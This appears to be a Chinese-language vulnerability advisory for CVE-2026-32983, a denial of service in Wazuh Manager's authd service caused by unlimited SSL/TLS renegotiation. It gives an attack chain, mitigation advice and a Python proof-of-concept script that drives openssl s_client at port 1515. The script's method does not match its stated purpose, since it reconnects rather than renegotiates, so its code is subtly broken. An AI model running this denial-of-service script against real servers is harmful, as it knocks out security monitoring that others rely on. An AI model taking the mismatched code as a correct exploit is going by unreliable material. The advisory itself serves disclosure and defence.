CVE-2026-32983 CVSS 5.8 中危

CVE-2026-32983 Wazuh Manager拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32983

漏洞类型

拒绝服务

CVSS评分

5.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wazuh Manager

漏洞概述

Wazuh Manager 的 authd 服务在 4.7.3 及之前的版本中存在安全漏洞。由于未对客户端发起的 SSL/TLS 重新协商进行适当限制，远程攻击者无需认证即可利用此漏洞。攻击者通过发送过量的重新协商请求，可导致服务器 CPU 资源耗尽，从而使 authd 服务拒绝服务，影响系统可用性。

技术细节

该漏洞位于 Wazuh Manager 的 authd 进程中，涉及 SSL/TLS 协议的处理逻辑。authd 服务用于代理注册，默认监听在 1515 端口并使用 SSL 加密。在受影响版本中，服务端未对客户端发起的 SSL/TLS 重新协商请求次数进行有效限制。攻击者可以利用这一缺陷，建立恶意连接并持续触发 SSL 握手重新协商。由于重新协商过程涉及复杂的非对称加密运算，大量并发请求将迅速消耗服务器的 CPU 资源，导致合法请求无法得到处理，进而引发拒绝服务。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别开放 Wazuh Manager authd 服务端口（默认 1515）的目标。

STEP 2

建立连接

攻击者与目标 authd 服务建立 TCP 连接，并完成初始 SSL/TLS 握手。

STEP 3

发起攻击

攻击者利用 SSL/TLS 协议特性，在现有连接上频繁发送 ClientHello 消息以发起重新协商请求。

STEP 4

资源耗尽

服务器因处理大量重新协商请求导致 CPU 资源被耗尽，无法响应其他合法的注册请求。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-32983: Wazuh Manager authd SSL/TLS Renegotiation DoS
# This script uses openssl to send repeated renegotiation requests.

import subprocess
import time
import sys

TARGET_HOST = "target-ip"
TARGET_PORT = "1515"

def trigger_renegotiation():
    print(f"[*] Starting DoS attack against {TARGET_HOST}:{TARGET_PORT}...")
    
    # Using openssl s_client with -reconnect flag to simulate renegotiations
    # In a real scenario, this would be looped or multi-threaded
    try:
        cmd = ["openssl", "s_client", "-connect", f"{TARGET_HOST}:{TARGET_PORT}", "-reconnect"]
        proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        
        # Let it run for a few seconds to consume resources
        time.sleep(5)
        proc.terminate()
        print("[+] Request sent. Check server CPU usage.")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    trigger_renegotiation()

影响范围

Wazuh Manager <= 4.7.3

防御指南

临时缓解措施

如果无法立即升级补丁，建议在防火墙或网络设备上限制对 Wazuh authd 端口（默认 1515）的访问频率或来源 IP。同时，可以通过配置 OpenSSL 参数（如使用 SSL_OP_NO_RENEGOTIATION）来禁用 SSL 重新协商功能，以缓解攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表